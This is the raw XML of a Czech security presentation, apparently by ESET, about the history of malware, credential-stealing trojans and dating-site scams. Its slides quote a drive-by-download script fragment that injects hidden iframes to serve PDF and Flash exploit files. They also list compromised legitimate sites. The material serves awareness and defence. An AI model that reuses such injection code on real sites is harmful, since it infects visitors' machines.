              <a:rPr lang="cs-CZ" sz="2000" err="1" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>; if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>name.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>("Adobe Acrobat") != -1) || (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>name.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>("Adobe PDF") != -1)) { document.write('&lt;iframe src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>readme.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>&gt;'); } if(name.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" err="1" smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>") != -1) { document.write('&lt;iframe src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>flash.swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" smtClean="0"/>
              <a:t>&gt;'); } } } catch(e){} } pdfswf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>();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cs-CZ" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000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7158" y="1571612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 smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>etnomagic.cz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images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>petrd.borec.cz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html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://florbal.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>domazlice.cz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images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mercenaries.clanweb.cz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images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tvsen.sk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images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>streba.sk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images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tvsen.sk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images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sso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s1.php5.sk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pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>/1/2/3/4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buy.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2400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Havěť na LEGITIMNÍCH stránkách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Trojan Win32/PSW.LdPinch.NCB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85720" y="1571612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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The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Bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>!, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ICQ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Miranda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IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RQ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Trillian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IM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RASDIAL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Total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Commander</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Commander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Becky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>!, Internet Mail, Microsoft Outlook, Outlook Express, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CuteFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, E-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dialer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, Far, WS_FTP Professional, Opera, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mozzila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QIP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Mozilla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Thunderbird</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, služba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ru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Eudora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Punto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Switcher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Gaim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Mozilla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Firefox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FileZilla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FlashFXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, Windows Live Messenger, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VDialer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SmartFTP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Direct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> FTP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RapGet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Rapidshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Instant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Downloader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Universal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Share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Downloader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Desktop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Podvody na seznamkách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/>
              <a:t>Hlavně v anglicky mluvících zemích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Útoky „modelek“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Vyznání lásky a pak potřeba peněz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1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Podvody na seznamkách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i="1" dirty="0"/>
              <a:t>Podívej se do profilu na moje auto a pak mi napiš o adresu, kam můžeš poslat svoje fotky v plavkách!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" i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28850"/>
            <a:ext cx="6192688" cy="470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03139"/>
            <a:ext cx="3240360" cy="449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8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>ěkuji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> za pozornost!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Igor Hák, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>hak@eset.cz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en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>www.eset.cz</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="27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1986, virus Brain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5791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275" y="4067175"/>
            <a:ext cx="58007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708920"/>
            <a:ext cx="5791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1986, virus Brain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68760"/>
            <a:ext cx="5724128" cy="274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1986 - dnešek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594515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Pozvolný nástup anonymity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úbytek „copyrightů“ a podpisů (přezdívek) v havěti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úbytek autorů havěti v podobě mediálních hvězd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Dnešek</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>prozrazení identity je „o hubu“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393192" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ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33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jiného soudku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594515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, 2006 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opačný směr - od „anonymity“ k publicitě</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393192" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ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93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t-Theme-v2009.1EN">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="00646C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B6C0C6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68CF9B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="ABD38C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E9D35E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="ED9F75"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F15D5A"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8590E1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2290D5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2290D5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Fedra Book">
      <a:majorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface="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green">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="00646C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B6C0C6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68CF9B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="ABD38C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E9D35E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="ED9F75"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F15D5A"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8590E1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2290D5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2290D5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Fedra Book">
      <a:majorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface="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 default">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="00646C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B6C0C6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68CF9B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="ABD38C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E9D35E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="ED9F75"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F15D5A"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8590E1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2290D5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2290D5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Fedra Book">
      <a:majorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface="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&amp; Section slides">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="00646C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B6C0C6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68CF9B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="ABD38C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E9D35E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="ED9F75"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F15D5A"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8590E1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2290D5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2290D5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Fedra Book">
      <a:majorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface="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ther">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="00646C"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="B6C0C6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68CF9B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="ABD38C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E9D35E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="ED9F75"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="F15D5A"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="8590E1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2290D5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="2290D5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Fedra Book">
      <a:majorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Fedra Sans Alt Pro Book"/>
        <a:ea typeface=""/>
        <a:cs typeface="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ET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride10.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride2.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride3.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride4.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride5.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="ESET">
    <a:dk1>
      <a:srgbClr val="00646C"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="000000"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="B6C0C6"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="68CF9B"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="ABD38C"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="E9D35E"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="ED9F75"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F15D5A"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="8590E1"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="2290D5"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="2290D5"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

